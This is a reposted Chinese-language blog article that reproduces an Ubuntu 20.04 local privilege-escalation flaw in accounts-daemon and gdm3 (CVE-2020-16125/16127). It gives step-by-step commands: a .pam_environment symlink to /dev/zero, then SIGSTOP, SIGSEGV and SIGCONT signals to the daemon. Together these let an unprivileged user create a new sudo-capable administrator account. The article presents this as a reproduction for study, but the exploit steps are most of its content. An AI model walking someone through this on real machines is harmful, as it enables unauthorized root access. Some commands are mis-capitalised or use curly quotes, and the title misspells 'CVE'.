ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

利用cse-2020-16127,cve-2020-16125进行漏洞再现

2021-04-27 22:02:32  阅读:293  来源: 互联网

标签:daemon 帐户 cse 16127 kill SIGSTOP accounts 495 2020


Ubuntu最新爆出的漏洞:无需系统密码,就能添加新的sudo用户、获取root权限,事后还能删除不留痕迹。

模拟测试

环境:Ubuntu 20.04
当前用户为普通用户权限,没有sudo权限

 

在用户主目录创建一个软连接

Ln -s /dev/zero/ .pam_environment

接下来,在系统设置中打开**“区域和语言”**,然后尝试更改语言

 

 

 

该对话框会冻结,只需忽略它,然后返回到终端即可。

一个名为accounts-daemon的程序正在消耗100%的CPU内核,因此你的计算机可能会变慢并开始变热。

 

在终端中,删除软链接。否则,你可能无法使用自己的帐户!
rm .pam_environment

下一步是将SIGSTOP信号发送到accounts-daemon,阻止它破坏该CPU内核。但是要做到这一点,首先需要知道accounts-daemon的PID

你可以通过运行top来找到PID。由于accounts-daemon被卡在一个无限循环中,因此它很快进入top列表的顶部。

 

接着用kill命令杀死SIGSTOP信号:

Kill  -SIGSTOP 495

然后注销帐户,但首先需要设置一个计时器,保证在注销后重置accounts-daemon。否则,前面的努力都将白费。

Nohup bash -c “sleep 30s; kill -SIGSEGV 495; kill -SIGCONT 495” &

注销后等待几秒钟,让SIGSEGV起效。如果漏洞利用成功,则会显示一系列对话框,让你创建一个新的用户帐户。这个新帐户具有管理员权限,可以运行sudo命令。

 

标签:daemon,帐户,cse,16127,kill,SIGSTOP,accounts,495,2020
来源: https://www.cnblogs.com/qbll/p/14710999.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有